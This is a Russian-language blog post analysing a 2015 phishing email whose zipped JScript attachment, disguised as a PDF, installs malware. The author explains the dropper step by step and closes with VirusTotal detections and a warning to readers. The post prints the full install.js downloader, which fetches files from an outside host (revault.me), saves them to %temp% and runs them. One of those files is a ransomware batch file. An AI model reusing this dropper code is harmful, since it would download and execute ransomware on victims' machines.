Анализ кода установщика вредоносов на jScript

Сегодня 27.10.2015 столкнулся с очередными «письмами счастья». Текст письма следующий:

Акт сверки(в приложении к пиcьмy).
Убедительная просьба до завтрашнего обеда выслать отсканированную копию подписанного с Вашей стороны экземпляра или же ваши замечания.
Хотели бы подчеркнуть, что за Вашей фирмой висит непогашенный платеж за август.

Файл представлял собой zip (акт_сверки_120951784.zip) в котором внутри .js, при этом расширение в имени стояло pdf, но за пробелами спрятано расширение js. Код JS не сложный, хотя и содержит много лишнего, сжат и содержит не читаемые названия переменных и функций. Я решил разобраться, что он делает.

Действия скрипта по шагам смотри далее…

Внимание, очередная атака через рассылку писем.

Действия скрипта по шагам:

• С помощью ExpandEnvironmentStrings определяет путь к папке %temp%\\
• Создаёт в папке скрипт install.js и записывает код, который в теле этого скрипта закодирован в base64.
• выполняет этот файл через WScript.Shell.Run

Вот текст файла install.js:

WScript.Sleep(46);
var E02B = «%temp%\\»;

function CreateObject(a) {
return new ActiveXObject(a)
}
var D3C5158E1E = CreateObject(«WScript.Shell»),
E02B = D3C5158E1E.ExpandEnvironmentStrings(E02B);

function A7A86A0482FA2(a, b) {
var c = new ActiveXObject(«MSXML2.XMLHTTP»);
c.open(«GET», a, 0);
c.send();
WScript.CreateObject(«Scripting.FileSystemObject»);
new ActiveXObject(«Scripting.FileSystemObject»);
var d = new ActiveXObject(«ADODB.Stream»);
fd41f99c0 = «Q8B7BAEFE15»;
d.Open();
d.Type = 1;
d.Write(c.ResponseBody);
d.Position = 0;
d.SaveToFile(b, 2);
d.Close()
}

A7A86A0482FA2(«domain/doc.css», «» + E02B + «doc_8774.doc»);
WScript.Sleep(36);

function B57298ED2A3574(a) {
D3C5158E1E.Run(a, 1, 0)
}

WScript.Sleep(85);

try {
B57298ED2A3574(«» + E02B + «doc_8774.doc»)
} catch (a) {}

function C4A49BE2A48F(a) {
D3C5158E1E.Run(a, 0, 0)
}
A7A86A0482FA2(«domain/style.css», «» + E02B + «style.css»);

A7A86A0482FA2(«domain/inject.css», «» + E02B + «vbbf15fa9b.bat»);
C4A49BE2A48F(«» + E02B + «vbbf15fa9b.bat 47E94-10B0E-F94B3-D246A»);

В коде скрипта install.js во время выполнения происходит следующее:

• С помощью ExpandEnvironmentStrings определяет путь к папке %temp%\\
• с помощью ActiveXObject(«MSXML2.XMLHTTP») получает по урлу revault.me/doc.css текст ответа и записывает его в файл %temp%\\doc_8774.doc
• запускает его через WScript.Shell.Run

• Также получает по урлу revault.me/style.css текст ответа и записывает его в файл %temp%\\style.css
• с этим файлом ничего не делает, я так понял нацелено на то, что из временной папки файл подхватит браузер

• Также получает по урлу revault.me/inject.css текст ответа и записывает его в файл %temp%\\vbbf15fa9b.bat
• запускает его через WScript.Shell.Run

Данные файлы и урл уже проверялись за день до этого на VirusTotal, вот ссылки на результаты проверок файлов:

• doc.css (Avast — Other:Malware-gen [Trj])
ссылка: virustotal.com/ru/file/f90c9accb27bdd2cc6ede160809d731d6c29ed06cb9017e8657115bdb30baa6a/analysis/1445941640/
• style.css (Kaspersky — UDS:DangerousObject.Multi.Generic)
ссылка: virustotal.com/ru/file/6b6d83e4787817915086425ad20e96e45b87df0f1d68c5232ff55fcf50091f05/analysis/1445945047/

• inject.css

AVG BAT/Crypt 20151027
Agnitum Trojan.FileCrypt.Gen.AAI 20151026
Avast VBS:Runner-JK [Trj] 20151027
DrWeb Trojan.Encoder.1418 20151027
Kaspersky Trojan-Ransom.JS.Agent.ah 20151027
Microsoft Ransom:BAT/Xibow.B 20151027
Qihoo-360 virus.bat.regautorungen.a 20151027

ссылка: virustotal.com/ru/file/d471003fb7e70ba098aed4b5db68e158eb8e67d54bf887586849f3f11fcf7d6e/analysis/1445940339/

Судя по данным VirusTotal — первый троян, второй просто опасный по версии Касперского, а последний шифрует файлы.

Будьте бдительны. 🙂

Добавить комментарий Отменить ответ